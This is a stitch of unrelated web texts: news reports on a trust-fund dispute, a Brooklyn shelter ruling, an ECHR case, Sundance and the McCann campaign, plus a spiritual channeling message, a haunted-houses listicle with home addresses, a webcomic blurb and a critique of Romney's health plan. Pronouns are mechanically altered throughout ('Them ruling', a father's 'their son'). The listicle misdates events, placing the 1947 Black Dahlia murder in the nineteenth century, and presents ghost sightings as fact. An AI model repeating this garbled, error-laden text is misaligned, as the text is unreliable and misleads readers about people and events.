The father said all funds expended from the account were spent with their son 's full knowledge , including roughly $ 40,000 for construction and installation of a handicapped-accessible ramp and bathtub for their son .
Another $ 26,000 was used to buy and make subsequent repairs to a handicapped-accessible van for Alex , who still uses the vehicle , according to Christopher Scafuri .
`` Contrary to the accusation made in the verified complaint , the Department of Children and Families did not remove the plaintiff from my home , '' the father said , adding that Alex `` chose to move '' after they told their son that their girlfriend and others were no longer welcome in their home .
Christopher Scafuri also said they received a written request for an accounting of the funds from an attorney representing their son . They said they left two voice messages for the lawyer , who never called them back .
Jomaris Colon admits to driving drunk in crash that paralyzed Alex Scafuri of Agawam
A new homeless shelter planned at 267 Rogers Ave. in Crown Heights will temporarily house 132 families , the city has said . View Full Caption DNAinfo/Rachel Holliday Smith
DOWNTOWN BROOKLYN — A Brooklyn judge on Monday lifted an order stopping homeless families from moving into a new Crown Heights shelter .
Brooklyn Supreme Court judge Katherine Levine said plaintiffs who had filed a lawsuit against the city over the 132-family shelter at 267 Rogers Ave. failed to show the facility would cause irreparable harm to the neighborhood .
Them ruling at a heated court hearing Monday afternoon will allow families to move into the controversial shelter effective immediately .
Previously , residents ' lawsuit and a subsequent temporary restraining order had halted move-ins a day after the first 10 families moved to the facility , one of 90 planned to open under Mayor Bill de Blasio 's overhaul of the Department of Homeless Services .
The facility is one of two in Crown Heights that faced significant backlash and a lawsuit after the city announced their openings . The other , a men 's shelter on Bergen Street , recently opened after a two-month delay due to a court battle .
The controversy negatively affected the residents that had already moved to the Rogers Avenue site , an attorney said in court on Monday . They stated that two families with histories of domestic violence chose to move out of the facility because they worried the publicity from the case would endanger them . They have since moved to other DHS shelters , the attorney noted .
DHS spokesperson Isaac McGinn said Monday 's ruling is “ another positive step forward in our citywide effort to turn the tide on homelessness . ''
`` We are proceeding with moving additional families into 267 Rogers so that they have the same opportunity to stabilize their lives as the families already residing at this location , '' they said in a statement .
The Rogers Avenue facility is the last of five new shelters currently planned by the de Blasio administration . The other 85 shelter locations — planned by the city to replace all cluster and hotel shelters in the city — have not yet been announced .
No violation of right to life in Demirtaş ' case , says ECHR
STRASBOURG
Selahattin Demirtas , co-chair of the pro-Kurdish Peoples ' Democratic Party , HDP , applauds supporters during an election rally in Istanbul , Turkey , Saturday , May 30 , 2015 . AP Photo
The European Court of Human Rights ( ECHR ) decided on June 23 that there was no violation of the European charter 's article on the right to life in a case concerning Peoples ' Democratic Party ( HDP ) co-chair Selahattin Demirtaş , who had complained that they had been exposed to a risk of death due to an article published in a local newspaper in 2007.A local newspaper in Turkey 's northern province of Bolu , the Bolu Express , published an article headlined “ Turk , here is your enemy ” ( Türk , işte karşında düşmanın ) on Oct. 11 , 2007 , in which the name of Demirtaş , who was a member of the Party for a Democratic Society ( DTP ) , a pro-Kurdish political party whose closure was ordered in 2009 , was cited with 20 fellow DTP members . The individuals named in the article were said to be “ the enemy ” of the Turkish nation and “ real murderers. ” Demirtaş had lodged a complaint against the author of the article , identified only as I.E. , at a local court , but the prosecutor declined to take any legal proceedings . Their appeal was also dismissed in 2008.Demirtaş complained under Articles 2 and 13 of the European Convention on Human Rights that although they had been exposed to a risk of death on account of the content of the article , the domestic authorities had failed to punish I.E.The ECHR reportedly considered that the complaints needed to be examined solely from the standpoint of Article 2 of the Convention , on the right to life.On June 23 , the ECHR ruled by six votes to one that there had been no violation of Article 2 of the Convention , thus not sentencing Turkey to any fines .
One of the most anticipated movies at this year 's Sundance Film Festival also turned out to be among the most divisive . On Friday afternoon , the Eccles Theater had to turn away hundreds of movie fans , and even a few industry VIPs , at the packed premiere of “ Swiss Army Man , ” starring Daniel Radcliffe and Paul Dano .
But the bizarre fable about a lost man ( Dano ) who befriends a farting corpse ( Radcliffe ) could win the festival 's award for the most walk-outs , as a continuous stream of audience members kept standing up and bolting for the door throughout the film .
The indie , directed by the music video duo Daniel Kwan and Daniel Scheinert , opens with Radcliffe ( as the corpse ) washing onto a shore . Dano 's character inspects the body , as it comes to life by twitching and passing gas .
The story unfolds in a magical realist style and features long discussions about masturbation , isolation and the meaning of life . It also features a kiss between Dano and Radcliffe ( who continues to flee their Harry Potter image by taking part in a reoccurring gag where their dead character maintains an erection ) .
“ The chance to play a dead guy in this context was too much fun to pass up , ” Radcliffe said in an audience Q and A .
Scheinert said the inspiration for the story was “ a fart joke . ”
The film has drawn mixed reactions .
https : //twitter.com/Amirosie/status/690696281757356032
https : //twitter.com/MattDentler/status/690699392680988672
As Sundance enters its second day , buyers have started to gripe that the movies are n't commercial this year , which may result in a batch of deals that slowly come together instead of heated bidding wars .
Oliver Graham was just three when they died of cancer , but their legacy lives on through an annual hockey tournament in their name .
Money raised at the tournament helps buy gas and grocery cards for families with sick children at Halifax 's IWK Health Centre , many of whom are staying at Ronald McDonald House .
Ronald McDonald House Canada runs a home just steps from the children 's hospital — with 18 private bedrooms , a full kitchen , laundry facilities , a playroom , and other facilities — where families from out of town can stay while their child is seeking treatment .
That 's where Oliver 's father , Drew , and brother , Jax , stayed on and off after the boy was first hospitalized as at 18 months old . Their mother , Kaitlin , primarily stayed at the hospital .
The house allowed the family to stay together , `` and that was so important to us , '' Kaitlin Graham told the CBC 's Information Morning .
Families pay just $ 11.50 per night to stay , but the Grahams found paying for things like gas and food was still a burden when caring for a very sick child .
Oliver lost their battle with cancer on June 5 , 2010 — 21 months after their initial diagnosis — and their family decided to give back .
The tournament trophy reflects Oliver 's love of trains . ( Kaitlin Graham )
Two-day event
A hockey tournament made sense , Kaitlin Graham said , because the sport was an important outlet for Drew when their son was sick . `` He would go out with the guys they worked with at Michelin , '' they said . `` That would be their release . ''
The first tournament — the Oliver Hudson Graham Memorial Cancer Sucks Cup — was relatively small . But eight years later , it has grown into a two-day event at the local rink in Trenton , N.S .
This year 's tournament runs is on Dec. 21 , between 10 a.m. and 1 p.m . The family is also hosting a free skate for families on Dec. 22 from 7 to 9 p.m .
A van full of donated new , unwrapped toys . ( Kaitlin Graham )
Team slogan
Graham said their team name is Oliver 's Express , because `` Oliver 's first love , beside their family , were trains . ''
The team jerseys always have a different quote on the back . This year , it reads : `` Sometimes the best way to help yourself is to help someone else . ''
`` That 's what we try to do with this tournament , '' Graham said .
Aside from assisting the families staying at Ronald McDonald House , some of the tournament 's proceeds will also go to the families of sick children who are staying on the oncology floor at the IWK , as well as a support fund for oncology patients that helps families cover costs associated with their child 's treatment .
Tournament organizers are also accepting donations of new , unwrapped toys suitable for children ages 0-16 .
“ Arrested Development ” season four will pick up where season three left off Posted by Terri Schwartz on January 9th
Though many years have passed since “ Arrested Development ” went off the air , we wo n't have to be worried about catching up in the new season . In a new interview , Mitch Hurwitz explained that the series will pick up from where the season three finale left off .
“ Each individual ( episode ) kind of depicts what happens in 2006 as the Bluths fled from the law on the Queen Mary ” in what was once the series ' finale , then explains what 's happened to them since and leaves them in the present day , Hurwitz told USA Today .
They added that only Michael Bluth will appear in all of “ Arrested Development 's ” 13 to 14 episodes , and confirmed that each episode will focus on a different character . They 're being assembled as a “ very , very complex puzzle ” of scenes “ shot out of sequence over many months. ” That is likely why they encouraged Netflix to release season four all at once and told fans they 'll likely want to go back and rewatch each episode several times to truly understand what 's going on .
“ The show will look very different , ” Hurwitz said . “ The bigger story is the family has fallen apart at the start of our show . They all went their own way , without Michael holding them together , so they 're left to their own devices , and they 're not the most successful devices . ”
They added , “ I can assure you that the characters are just as damaged , self-involved and self-righteous as ever . ”
Another fun fact : After initially being a holdout , Michael Cera has now joined the “ Arrested Development ” writing team .
What are you most looking forward to about the new season of “ Arrested Development ” ? Tell us in the comments section below or on Facebook and Twitter .
Buy Photo Three Pools Recreation Site is seen on a fairly slow day in summer . ( Photo : Zach Urness / Statesman Journal ) Buy Photo
U.S. Forest Service officials announced the first step toward addressing overcrowding and drunken behavior at some of Oregon 's most iconic outdoor places .
Officials laid out a series of new rules and regulations for Three Pools Recreation Site , Opal Creek Trail , Elk Lake and Breitenbush River east of Salem .
The goal is to provide relief for places impacted by large crowds , drunken behavior and damage to the natural environment . Now they want the public 's input .
“ We 're trying the least-restrictive management techniques to start , ” said Josh Weathers , developed recreation manager for Willamette National Forest . “ We still want people to come up and enjoy these places , but we want to encourage more responsible use and stop places from being ‘ loved to death . ' ”
A story on the proposed rules appeared on the front page of the Statesman Journal 's March 28 edition , but many readers had questions about the details and queries such as “ who will enforce these rules ? ” and “ why is my favorite place suddenly so crowded ? ''
Here are a few answers .
What are the rules , in a nutshell ?
Three Pools : Alcohol would be banned and only people parking in the site 's 94-space lot would be allowed into the popular swimming holes northeast of Mehama .
Opal Creek Trail : Campfires would be banned at most backpacking campsites along Opal Creek Trail , near Jawbone Flats and up Kopetski Trail . Parking would be limited to a quarter mile down Forest Service Road 2209 from the Opal Creek Gate Trailhead .
Elk Lake , Breitenbush River , French Creek , Blowout Creek : Dispersed camping — user-created sites not part of an official campground — would be illegal for larger area along roads that access these waterbodies .
Why these type of rules ?
The Forest Service is basically looking for a middle way to deal with overuse and bad behavior .
Instead of limiting crowds with a permit system — or capping the number of visitors allowed — they propose limiting parking spaces . They hope it achieves the same goal .
The ban on alcohol has worked well at other popular sites , such as Terwilliger Hot Springs and the Clackamas River corridor , Weathers said .
Getting rid of about 50 to 60 of the most problematic dispersed campsites — especially in popular recreation corridors like Breitenbush River near Detroit — helps encourage day use while still leaving open vast swaths of Willamette National Forest for dispersed camping , Weathers said .
What would the penalty of breaking the rules be ?
Violating the alcohol ban : $ 200
Violating the campfire ban : $ 250
Violating dispersed camping ban : $ 100
Violating parking rules : $ 50
Each fine would also carry a $ 35 processing fee .
Who would enforce the rules ?
Willamette National Forest has 10 rangers who can issue citations but who are not armed . It has two officers who are armed and are trained for more confrontational situations .
The Forest Service also has relationships with deputies from the Marion County Sheriff 's Office who can assist , especially in the Three Pools and Opal Creek area .
“ We have a deputy that patrols the Little North Santiam canyon , and if they called for help , we would assist the best we were able , ” said Lt. Chris Baldridge of the Marion County Sheriff 's Office . “ We also have intergovernmental agreements where we 're able to enforce the rules of a ( federal ) agency . In this case , we would take a look at it if they proposed it . ”
Weathers said the Forest Service would seek that type of intergovernmental agreement if the rules are approved . Meaning , there 's a chance county deputy could enforce Forest Service rules .
How can I make my voice heard ?
You can make a comment that the Forest Service will consider in shaping these rules at https : //cara.ecosystem-management.org/Public/CommentInput ? project=51339 . The deadline for making a comment is April 14 .
If approved , when would these new rules go into effect ?
They would be in place this summer , likely beginning Memorial Day — May 29 . A decision is likely by May 1 .
How bad is the problem ?
That depends on how you view it . In winter , and during much of late autumn and spring , crowds are sparse .
During the height of summer , from Mid-June to Mid-August , it 's a different story . Hot summer days bring hundreds of people to Three Pools , a relatively small area . Opal Creek has the same problem . Both sites have seen drug use , heavy drinking and irresponsible camping , officials said .
The main problem at dispersed campsites along Breitenbush and the other rivers and creeks is human waste washing into streams and damage to vegetation . Those sites also discourage day-use visitors , Weathers said .
`` As our beautiful forest becomes more popular , we find there are a few locations that are not able to withstand the impacts from visitors , '' District Ranger Grady McMahan said . `` In addition to litter and human waste , irresponsible drinking is a problem at Three Pools Day Use Area , specifically . We want all people to feel welcome to come enjoy their forest ; that means asking everyone to behave considerately of others and the land . ''
What 's causing the increase in visitors ?
Population growth in the Willamette Valley , unusually hot summers and lots of attention from social media and traditional media outlets have created a perfect storm for places like Three Pools and Opal Creek .
Weathers said visitors frequently travel from Portland 's metro area to visit Three Pools and Opal Creek , inspired by “ best swimming holes ” lists posted by media companies and spread through social media . The social media website Instagram , in particular , has driven people to the Little North Fork canyon seeking pictures to post .
The Statesman Journal , along with The Oregonian , Willamette Week , Outdoor Project , OnlyInYourState.com and countless magazines and websites have featured stories about recreating at Three Pools and Opal Creek .
The increase in visitors to outdoor destinations , in Oregon and the West , has been a well-documented trend spanning state parks , national parks and federal lands .
Zach Urness has been an outdoors writer , photographer and videographer in Oregon for eight years . They are the author of the book “ Hiking Southern Oregon ” and can be reached at zurness @ StatesmanJournal.com or ( 503 ) 399-6801 . Find them on Twitter at @ ZachsORoutdoors .
Read or Share this story : http : //stjr.nl/2oJD4Xd
The Twitter account for Madeleine McCann has been shut down ( Picture : PA )
The official Madeleine McCann Twitter profile has been shut by their parents after receiving online abuse , amid a dispute with a fellow missing child account dedicated to Ben Needham .
Tension had been building between the two missing persons campaigns in recent weeks after Kerry Needham , whose son Ben vanished 24 years ago in Greece , questioned the huge sum of police money spent on looking for Madeline McCann .
The official Find Madeline Campaign group , endorsed by the McCanns , said it has experienced a spike in abuse over the past few weeks and reportedly blocked the Ben Needham Campaign account .
MORE : Watching these adorable guinea pig sisters playing tug of war with a blade of grass is surprisingly addictive
The Ben Needham account is still going strong ( Picture : Twitter )
Kerry Needham ( Picture : PA )
‘ They ( Kate and Gerry ) agree it 's time to remove ourselves from a place that allows so much toxic content to be directed at us and does not permit us the ability to protect ourselves from people who want to damage the search for Madeleine , ' the Official Find Madeleine Campaign Facebook page said .
Advertisement
Advertisement
But the decision to close the account has been criticised by Ms Needham .
‘ It feels like a personal attack on me . It is deeply , deeply hurtful , ' they told the Daily Mirror .
‘ I have myself had massive amounts of slanderous abuse from supporters of the McCann campaign in the past but I have never taken that personally .
‘ I have never criticised the McCann family . I have only ever criticised the authorities for the way the two cases have been handled so differently . '
MORE : Spectacular photo captures lightning in an erupting volcano on a starry starry night
Kate McCann and Gerry McCann ( Picture : Getty Images )
Three-year-old Madeleine disappeared during a family holiday in Praia da Luz , Portugal , in May 2007 and Ms Needham 's 21-month-old son Ben vanished from the Greek island of Kos in July 1991 .
Both families believe their children are still alive .
MORE : Introducing the Looncup , a mooncup that will text you your period stats every month
MORE : Facebook to launch satellite to give free internet to Africa
As you have already become aware of , the upheavals are continuing for many of you , while for others , you seem to have entered smoother waters alrady . Again , never forget to listen to your own inner voice before you do that of other 's , and never compare your journey to others lest you should think yours is not on the rails as it were . In other words , although these times are indeed intense , they will be perceived very differently for you all , and even if you will find someone that can report circumstances that resonates with what you are experiencing , there is no need to worry even if you do find yourself without equals .
For you are ALL equals , whether you face your deepest challenges either mentally or physically at the moment , or whether you find yourself sailing along in blissful waters . No one is more nor less than the others , and as we have touched upon earlier , it is indeed imperative that you do not loose the focus on your journey by looking too much over the shoulders of another . This does not mean that you must discontinue to connect , far from it , but again , do not measure your journey with another 's measuring stick . For you are all connected , but you all sing to your own tune , and even if you together make up a beautiful and mangnificent choir , your voice in this is equal to no one else 's .
So again rest assured that all is well , even when you find yourself looking at a very different perspective than others might rapport to you , and as such , what you see is your truth , just as what they see is theirs . But again , you will all end up in the same place , but your journey to get there will differ in all sorts of ways . Some will be perceived as very direct and almost hassle free , while others will feel as if constantly being entangled in a web of weeds trying their best to slow you down . Just remember , no matter how hard or how easy you think you have it at the moment , you are all making the same progress . It might not seem like that to some of you , but that is an indisputable fact . Hopefully , this will make you all see your journey in a slightly different light than if you think you are lagging behind your compatriots .
Remember dear ones , you are all in this together , and as the old saying goes , together you stand , divided you fall . No , not falling as in failing , rather falling as in falling for the temptation to make this journey even more challenging by attempting to do it as a solo journey . So again we say , remember to connect , now more than ever , and remember that you are all an important part of this huge and luminous web you have generated by weaving together you own unique individual strand of light with that of so many others . And this web will continue to sustain you all , no matter how much you think you contribute to it , or no matter how much you feel you need to get back from this weave of life-giving energy . For in this , you are also equally important , for what you bring to this weft , is like no one else do , and what you get from this net , is also unique . But together , you give and take in such a beautiful rhythm it is making this whole creation pulse with a life that is simply awe-inspiring for us to watch .
For this is indeed YOUR creation , and as such , there is no one amongst you who must think of themselves as inferior in any way in this process . For no matter how high or how low you feel yourself flying at the moment , you are all soaring high because of what you bring to this collection of luminous souls that have chosen to weave together their destinies thus . And for every day , this beautiful loom of light is spinning a net that reaches ever wider and can carry even more weight . So stay connected , and know that this will not only aid you , but it will also be able to influence the lives of so many others out there , as you continue to stretch and weave and build this net of love ever stronger and ever wider for every time you dip into this pool of light and take a deep drink , or you bring another pitcher of love to add to it . For remember , both these actions carry the same value , and the more you drink of it , the more it will be filled . So keep nurturing yourselves and others by constantly seeking to connect to these strands of love and light that surrounds you on all sides by now . That way , you will ensure that this web of light will be able to catch the fall of more and more tired souls , too despondent to make it alone , but ready to make an effort to help themselves when they see what you have managed to build already .
Advertisements
Looking for scary and real haunted houses in California ? You 're in the right place . One of the most predominant states of the US , California , is known for many historic landmarks located therein . From places you ache to visit to places you would rather stay away from .
Following are the ten scariest real life haunted houses in California – all of which possess a dark history .
Homes where residents , visitors and people who are just passing-by , report insane paranormal and psychic phenomena .
Some hear voices , some see apparitions and some have even had physical contact with whoever or whatever haunts these places .
Not to mention the mind-bending phenomena that real psychic mediums have experienced at these locations .
No matter how strong willed you might be , one thing 's for sure : you will be terrified beyond reason .
10 Insanely Scary Real Life Haunted Houses in California
# 10 ) John Sowden House , Los Angeles
On January 15 , 1947 , a woman 's body was found on a vacant lot .
The woman was Elizabeth Short , nicknamed “ Black Dahlia ” by the press .
Them murder became one of the most publicized murders of the nineteenth century because of the gruesome way in which their body had been found :
Surgically cut in half from the waist down , washed and cleaned by their killer and posed .
The John Sowden house was presumed to be the site where the prime suspect , Dr. George Hill Hodel had supposedly killed them before fleeing the country .
Subsequent residents of this scary house have heard strange noises such as dragging of heavy chains , heavy footsteps , and voices calling their name ,
There have also been sightings of apparitions assumed to be Hodel .
The house was featured on an episode of Ghost Hunters . The apparition was seen on video as well as caught on a digital EVP recorder saying ‘ This is George ' .
Address :
5121 Franklin Ave .
Los Angeles , CA . 90027
United States
# 9 ) Heaven 's Gate Suicide House , Rancho Santa Fe
In 1997 , when cult leader , Marshall Applewhite came to know that Comet Hale-Bopp was about to pass , they somehow believed that the comet was in fact a vessel from outer space which had come to get them .
Thus , along with thirty nine followers of Heaven 's Gate ( who called themselves the “ away team ” ) , they committed the largest mass-suicide recorded on US soil at a mansion they had purchased in Rancho Santa Fe , California .
This chilling history might be the reason why several people have reported feeling a sense of uneasiness as though some of the followers might still be there .
A feeling of doom and lurking presence , voices and other paranormal activities have all been reported .
Recent visitors have discovered various creepy dolls strewn about the area . Some with their heads removed , others with the wrong body parts hastily sewn on . One can only wonder what that means .
Address :
18241 Paseo victorias
Rancho Santa Fe , CA . 92091
United States
# 8 ) The Castro House , Sonoma
The Castro House in Sonoma city once belonged to a government official and their family .
The family was nothing short of savage to their servants .
The servants were all living in the servant quarters , away from any sort of aid . They were all made to quietly endure whatever the family subjected them to .
Many believe that the house is haunted by the ghost of a maid who died here .
Due to the history , it was n't odd when subsequent residents reported hearing sobbing noises , and seeing ghostly figures at night emerge from the servant quarters .
Which lends credence to the notion of this being one of the many real lives haunted houses in California .
Address :
180 East Napa Street
Sonoma , CA . 95476
United States
# 7 ) Bessie Love 's Cabin , Los Angeles
In the middle of the 18th century , while trying to run away after stealing gold from Tiburcio Vasquez ( commonly referred to as the Mexican Robin Hood ) , two robbers were caught and killed .
This fact was unknown to American screen actor , Bessie Love who purchased a house on the land this event had taken place on , almost half a century later .
However , shortly into their stay in their first home , Bessie reported feeling a sense of uneasiness .
This was accompanied by cold spots on their skins , hearing men 's voices and electrical anomalies .
A houseguest even reported to have seen a horrifying apparition wearing a cowboy hat . The terrifying house is believed to be haunted to this day .
Address :
2401 Laurel Canyon Boulevard
Los Angeles , CA . 90046
United States
# 6 ) Dudley House , Ventura
This is probably amongst the most beautiful real life haunted houses in California .
However , beauty is n't why it made this list of most haunted houses .
This Victorian style manor is thought to be home to a man who has been living here since 1892 .
The man was among the first family to have ever lived here .
Visitors reported to have seen a blue light flashing from the kitchen and a clock to go off at intervals . That clock , has n't worked for decades .
Address :
197 North Ashwood Avenue
Ventura , CA . 93003
United States
# 5 ) Rengstorff House , Mountain View
In 1860 , German immigrant , Henry Rengstroff built a 16-room mansion with a large garden .
The Rengstroff family continued to live in their real life haunted home up until 1959 . Subsequent tenants have all been driven away from their dream home due to one sole reason – a teenager .
The frightening ghost of a beautiful teenage girl has been seen by nearly everyone who has ever lived here since 1959 .
The young woman can be seen staring out the upper floor window at something sadly and longingly , occasionally crying .
Perhaps most terrifying is this : Several mothers who recently visited the site brought their toddlers , assuming the stories were just that…stories .
However , during their visit the three toddlers suddenly stood rigid , staring at the window where the ghost girl is often seen . The boys suddenly started speaking in tongues simultaneously .
Horrified , the mothers screamed , grabbed their children and ran .
As soon as they left the vicinity of the house , the children stopped speaking in tongues and began to cry .
Address :
3070 North Shoreline Blvd
Mountain View , CA . 94043
United States
# 4 ) Joan Crawford House , Los Angeles
Joan Crawford probably thought that she 'd be remembered for movies such as ‘ What Ever Happened to Baby Jane ? ' , however , they went down in history as being a vicious adoptive mother .
While living with their adoptive mother , Christina Crawford reported that even their house was nothing less than spooky .
When meeting with subsequent tenants years later , Christina said that they too had felt the paranormal activity as them
This included seeing frightening figures , hearing voices from the wall , fires breaking out without sources and a haunting feeling which drives the inhabitants into depression .
Real life haunted houses in California do n't come much scarier than this .
Address :
426 N Bristol Ave
Los Angeles CA . 90049
United States
# 3 ) Bennett Home , Glendora
This event is thought to have occurred as recently as 1982 , when the DAR ( Daughters of American Revolution ) reported hearing strange noises and seeing the figure of a man during their first monthly tea in the house they had just bought for their organization .
The spirit in this case is thought to be that of a man who had been living in the house from 1910 to , apparently , this day .
Address :
Bennett and Vermont
Glendora , CA . 91741
United States
# 2 ) Potter School House , Bodega
The Potter School House was the site where Alfred Hitchcok filmed their movie , ‘ The Birds ' .
The fact that the movie is itself a horror film adds more effect to the fact that the location was also haunted .
The crew reported to have felt paranoid on set .
An image of an apparition of a woman was also caught on camera dressed in Victorian style clothes .
Address :
17110 Bodega Lane
Bodega , CA . 94922
United States
# 1 ) H.B Gillis House , Yreka
Hudson B. Gillis was seemingly so proud of the house they had built in 1895 that they decided never to part ways with it .
Former residents have all had one thing to say about this house – it 's haunted .
They felt cold spots , heard voices and even made physical contact with Hudson himself .
Address :
223 North Oregon Street
Yreka , CA . 96097
United States
Conclusion
The Californian real life haunted houses all mentioned on this list leave visitors terrified .
From the house where the Black Dahlia murders took place , to the house Hudson B. Gillis loved so much they never wanted to leave , all of them will leave you questioning “ reality ” .
More Haunted Places in California
Want to discover more haunted locations in California to explore ?
Great , just click the link below !
Click here to discover more haunted locations in California
The mystery of the religious decorations that lie underneath the high street of a medieval market town may never be solved if insect infestation can not be halted
Mysterious carvings inside a hidden cavern linked to the Knights Templar is in danger of disappearing before their riddle is solved . Having survived more than 700 years , the religious decorations in the ancient cave at Royston , Hertfordshire , are under attack from an infestation of worms eating the chalk walls behind them .
The beehive-shaped chamber was hewn out of a 180ft-thick seam of chalk and extends 30ft beneath the centre of the market town , underneath a betting shop . It was uncovered by chance during building work in 1742 and the depictions of biblical scenes and portraits of Christian martyrs inside it have puzzled historians ever since .
`` Some scholars believe many of the carvings depict characters revered by the Knights Templar – warrior monks who protected pilgrims on their journeys to the Holy Land in the 12th and 13th centuries , '' James Robinson , the custodian of the cave , told Cornerstone magazine this month .
The shape of the cave is believed to be modelled on the Church of the Holy Sepulchre in Jerusalem and its strange carvings include depictions of Christian martyrs worshipped by the templars , such as St Katherine . The knights had a special reverence for this saint as it was on 25 November , St Katherine 's Day , that they won a victory over the Saracen leader , Saladin , in 1177 . Other engravings on the walls of the cavern show St Christopher and St George .
Other images in the cave , such as the Sheela Na Gig fertility symbol , suggest that its origins may stretch further back to the days when Royston was a staging point on the the Icknield Way – a track that was ancient when the Romans arrived in Britain .
The site is regarded as one of Britain 's least-known medieval treasures , remaining obscure because it is one of the few British locations with a templar connection that does not appear in Dan Brown 's thriller The Da Vinci Code .
`` It is hugely important that we find ways of halting the threat to this extraordinary ancient structure , '' said Philip Venning , secretary of the Society for Protection of Ancient Buildings . `` Having survived for so long , it would be tragic if these fragile carvings were lost to future generations . ''
The porous nature of the chalk walls makes them prone to damp and flooding , while old sewage leaks have leeched into the walls and softened the chalk . This provides nourishment for the worms which feed on decayed matter and then excrete the chalk . Over the past five years some of the detail has been destroyed , leaving a honeycomb appearance on parts of the wall .
`` People are astounded that such a fascinating and mysterious site can exist in such an ordinary setting as the high street of a small town , '' says Robinson . `` Beneath the modern facade of Ladbrokes betting shop and the main road lies a unique document of this country 's history . ''
The only other example of a similar cave is at Sloup , in the Czech Republic .
`` Why would a dinosaur need a gun ? '' asked the shop owner .
`` Self-defense . ''
The owner 's gaze dropped to the three-inch claw that had chipped their display case .
`` These are killing claws , '' said the dinosaur , whose name was Tark . `` For sheep , or cows . I merely want to disable an attacker with a precision shot to the leg or other uh , limbal region . ''
`` Uh-huh , '' the owner said . `` Or maybe you figure humans shoot each other all the time , but if someone turns up ripped in half the cops are gon na start lookin ' for dinosaurs . ''
Tark carefully pounded the counter . `` There used to be a time , '' they said , `` when gun dealers would actually sell people guns ! A time . . . called America . I miss that time . ''
Let Us Now Praise Awesome Dinosaurs .
Speaking of books ! Remember Asterios Polyp , which I recommended a few days ago ? I am now UPPING my recommendation to `` This is one of the best comics I 've ever read '' . I really loved it , you guys ! PERHAPS YOU WILL LOVE IT AS WELL ?
GUESS WHAT JUST CAME OUT : IT 'S MY NEW BOOK ! ! If you 've ever wondered what you 'd do if you were stranded in the past , wonder no longer ! With HOW TO INVENT EVERYTHING , you 'll reinvent civilization from scratch , no matter what time period you 're in . You 'll become the single most influential , decisive , and important person ever born . You 'll make history ...
... better .
Here 's the trailer !
One year ago today : so yeah the only cure for boner fever is fewer boners . hey thanks for reading my comic today everyone ! !
– Ryan
Of course , Romney 's plan on that day was not terribly specific . And they have n't added many specifics since , although a series of upcoming policy speeches could change that . This aversion to detail has been Romney 's signature approach to policy and you can understand why . Providing details about their policy proposals would mean owning up to difficult , but inevitable trade-offs—for example , the trade-off government spending and health insurance coverage . Reduce the first , as Romney proposes , and you 'll inevitably end up reducing the second .
But , as with the economic plan , it 's possible to perceive Romney 's general approach to health care : They want to scale back health insurance , so that it provides less protection from medical bills and is harder to get from sources that have historically provided comprehensive coverage . In theory , this transformation will unleash market forces that restrain the cost of medical care . In practice , it will cause serious hardship , by exposing tens of millions of Americans to crushing medical bills or forcing some of them to go without necessary , even life-saving care .
That sounds awfully harsh , I know . But it 's a fair interpretation once you examine the four main ideas Romney has embraced so far :
Repeal the Affordable Care Act : Projections suggest more than 30 million additional people would get insurance from the Affordable Care Act , some through Medicaid and some through subsidized private insurance . If Romney repeals the law , these people would be uninsured . Millions of others stand to get better insurance because of the law . That 's particularly true of those with pre-existing conditions who buy coverage on their own . The coverage available to them now is typically very expensive , not very protective , or some combination of the two . The Affordable Care Act will allow these people to buy the same policies as healthy people , at the same prices . Take away the law and they 're back to the same , vulnerable position they occupy today .
The law 's other benefits would vanish , too . Letting young adults enroll in their parents ' policies ? Gone . Free preventative care ? Gone . Enhanced state authority to regulate insurance rates ? Gone . Yes , it 's possible Romney could embrace some of these smaller reforms—and , if I had to bet , they probably will at some point . The young adult provision , for example , seems to be awfully popular . But these concessions are likely to achieve only a small fraction of what the Affordable Care Act would .
Change the tax and regulatory treatment of private insurance : This is probably the least understood part of Romney 's plan . Romney has endorsed a familiar set of conservative ideas that would affect private insurance , directly and indirectly . Some of these ideas , like malpractice reform , make sense in certain contexts . But Romney 's versions of them are unhelpful at best and dangerous at worst .
The most important of these is a proposal to change the tax treatment of private health insurance . Ever since the 1940s , the federal government has treated employer-provided insurance as distinct from wages , exempting it from income taxes . This makes employer-sponsored insurance more valuable and , for much of American history , it made employer insurance a stable source of health coverage for the majority of working-age people . But it 's become less reliable in the last two decades or so , as medicine has become more expensive and companies have tried to squeeze their labor costs . In addition , economists agree almost universally that the tax break distorts the health insurance market , by making benefits more valuable than wages . The existing tax break also penalizes people without access to employer insurance , since there 's no equivalent tax break for people who buy coverage on their own .
Romney proposes to get rid of those distortions , which is a perfectly fine idea in theory . In fact , the Affordable Care Act includes an effort to do just that , albeit gradually , by limiting the current exemption to a fixed amount and then letting that limit rise slower than the price of insurance ( so that it gradually declines in value ) . But precisely because reducing the tax break would reduce the incentives for employer-sponsored insurance , it 's important to discourage employers from dropping coverage and/or to create alternative ways for people to find affordable , comprehensive benefits .
The Affordable Care Act does this , by penalizing employers that do n't offer insurance to employees and by making insurance available to all people , at uniform rates , regardless of pre-existing condition . Romney would n't take those additional steps or anything like them . Romney promises that the tax ( and regulatory ) changes they envision will cause more consumers to shop for insurance , producing more vibrant competition and bringing down the price of medical care . That may be true , to a point—even liberals like me agree that market forces in health care can be constructive . But the market Romney envisions simply wo n't work for a lot of people , because insurers will be able to exclude all but the safest medical risks .
David Cutler , the Harvard economist and former Obama campaign adviser , explained the situation at the new blog for the Journal of the American Medical Association :
Letting people roam free to make purchasing decisions on their own is fine if markets work well . But health insurance markets do n't , as any economist ( or consumer ! ) knows . In the individual market Romney envisions , people will not be guaranteed coverage ; insurance premiums can increase without limit when a person gets sick ; and basic benefits for mental health care , maternity care , and countless other services will be eliminated .
That last part , about the elimination of benefits , is a reference to Romney 's wish to allow cross-state insurance sales . Most experts believe this would render most existing state regulations on benefits worthless , since insurers would gravitate to the states with the least requirements , just like credit card companies have . If prices came down , it 'd only be because insurance was covering less .
One way to assess the impact of a Romney-like plan is to examine the impact of John McCain 's 2008 plan , which called for nearly the same set of changes . Here 's what one paper in the journal Health Affairs predicted would happen : `` Moving toward a relatively unregulated nongroup market will tend to raise costs , reduce the generosity of benefits , and leave people with fewer consumer protections . '' An analysis by Linda Blumberg of the Urban Institute , came to essentially the same conclusion and suggested the result might even be fewer people with insurance .
